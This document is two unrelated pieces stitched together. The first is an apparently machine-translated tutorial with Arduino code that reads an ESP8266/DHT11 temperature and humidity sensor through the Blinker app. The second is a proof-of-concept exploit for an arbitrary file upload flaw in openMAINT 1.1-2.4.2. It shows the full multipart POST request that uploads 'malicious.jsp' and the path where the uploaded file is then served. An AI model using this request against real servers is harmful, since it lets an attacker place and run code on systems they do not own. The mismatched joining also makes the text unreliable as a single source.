In this article, let’s take a look at how to use ESP8266+DHT11 and Binker to realize the reading of indoor temperature and humidity. Achieve the effect Preparation of materials esp8266DHT11 Line connection VCC-- 3VGND--GNDDATA-- 2 Code #define BLINKER_WIFI #define BLINKER_MIOT_SENSOR //Introduce Xiaoai classmate #include Blinker.h #include DHT.h //DHT11 sensor header file #define DHTPIN 4 //Define DHT11 module connection pin io4 (D2 pin) #define DHTTYPE DHT11 //Use the DHT11 temperature and humidity module, of course you can also replace other DHTs char auth[]='1c2ce3eef946'; //The key key of the lamp app char ssid[]='PDCN'; //WiFi name to connect to char pswd[]='1234567890'; //WiFi password BlinkerNumber HUMI('humi'); //Define the humidity data key name BlinkerNumber TEMP('temp'); //Define the temperature data key name DHT dht(DHTPIN, DHTTYPE); //Define dht float humi_read=0, temp_read=0; //Initialize the read data //Dashboard components void heartbeat() { HUMI.print(humi_read); //Relay humidity data back to blinkerapp TEMP.print(temp_read); //Relay the temperature data to blinkerapp } //Real-time curve chart component void dataStorage() { Blinker.dataStorage('temp', temp_read); Blinker.dataStorage('humi', humi_read); } //The data is returned to Xiao Ai classmate void miotQuery(int32_t queryCode) { BLINKER_LOG('MIOT Query codes: ', queryCode); int humi_read_int=humi_read; //Convert float to int type, integer BlinkerMIOT.humi(humi_read_int); //Xiaoai receives humidity BlinkerMIOT.temp(temp_read); //Xiaoai receives temperature BlinkerMIOT.print(); } void setup() { //Initialize the serial port Serial, enable debug output Serial.begin(115200);//Bad rate BLINKER_DEBUG.stream(Serial); BLINKER_DEBUG.debugAll(); Blinker.begin(auth, ssid, pswd);//WIFI initialization settings Blinker.attachHeartbeat(heartbeat);//Register dashboard dht.begin(); BlinkerMIOT.attachQuery(miotQuery);//Register Xiaoai Blinker.attachDataStorage(dataStorage);//Register real-time curve } void loop() { Blinker.run();//Responsible for processing the data received by blinker. Each time it runs, it will parse the data received by the device once. (This is very important) float h=dht.readHumidity();//Read the humidity data collected by DHT11 float t=dht.readTemperature();//Read the temperature data collected by DHT11 if (isnan(h) || isnan(t))//Judge whether the temperature and humidity value is empty { BLINKER_LOG('Reading sensor data failed'); } else { BLINKER_LOG('Humidity: ', h, ' %');//Print out debug information BLINKER_LOG('Temperature: ', t, ' *C'); humi_read=h; temp_read=t; } Blinker.delay(200); //Delay function, maintains connection between devices and data reception processing during the delay process } About the temperature and humidity change curve The cloud storage data here only supports networked devices. If the thermometer is powered off and the network is not stored, the data will not be stored, and it will suddenly decline in the curve chart, and it will suddenly rise after reconnection. The cloud storage function here is not very powerful. If you modify the code and re-upload the program, the data stored in the cloud will be cleared before. 2. Specific functions (1) Cloud storage data function: void dataStorage()//Cloud storage temperature and humidity data function { Blinker.dataStorage('temp', temp_read);//Storage temperature Blinker.dataStorage('humi', humi_read);//Storage humidity }Blinker.dataStorage('temp', temp_read); The first parameter is the data key name, which is used to display in the mobile phone icon, and the second parameter is the data variable to be stored. (2) After writing the function in the code, you need to call this function in the main loop, and the call function is as follows: Blinker.attachDataStorage(dataStorage); This function means that the above dataStorage function will be called every time the loop is to achieve the effect of storing the data obtained every time. APP Layout Little Love Effect

# Exploit Title: openMAINT 1.1-2.4.2 - Arbitrary File Upload # Dork: N/A # Date: 2020-08-19 # Exploit Author: mrb3n # Vendor Homepage: https://www.openmaint.org/en # Software Link: https://sourceforge.net/projects/openmaint/files/1.1/openmaint-1.1-2.4.2.zip/download # Version: 1.1-2.4.2 # Category: Webapps # Tested on: Ubuntu 16.04 # CVE: N/A # POC: http://localhost:8080/openmaint/administration.jsp # POST /openmaint/services/json/file/upload?CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf HTTP/1.1 Host: 192.168.1.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------12239060382062588071523757460 Content-Length: 1369 Origin: http://192.168.1.1:8080 DNT: 1 Connection: close Referer: http://192.168.1.1:8080/openmaint/administration.jsp Cookie: JSESSIONID=5BAAEBDCC2151BD59ED2CD6FD3CA8165; CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf Upgrade-Insecure-Requests: 1 -----------------------------12239060382062588071523757460 Content-Disposition: form-data; name="fileStore" images -----------------------------12239060382062588071523757460 Content-Disposition: form-data; name="folder" d41d8cd98f00b204e9800998ecf8427e -----------------------------12239060382062588071523757460 Content-Disposition: form-data; name="file"; filename="malicious.jsp" Content-Type: application/octet-stream [Malicious code here] -----------------------------12239060382062588071523757460-- # The malicious file will be uploaded directly to the /upload/images directory with the file name unchanged, example: http://192.168.1.1:8080/openmaint/upload/images/malicious.jsp # How to fix: Update to the latest version # Earlier versions as well as other 1.1-x versions are likely vulnerable.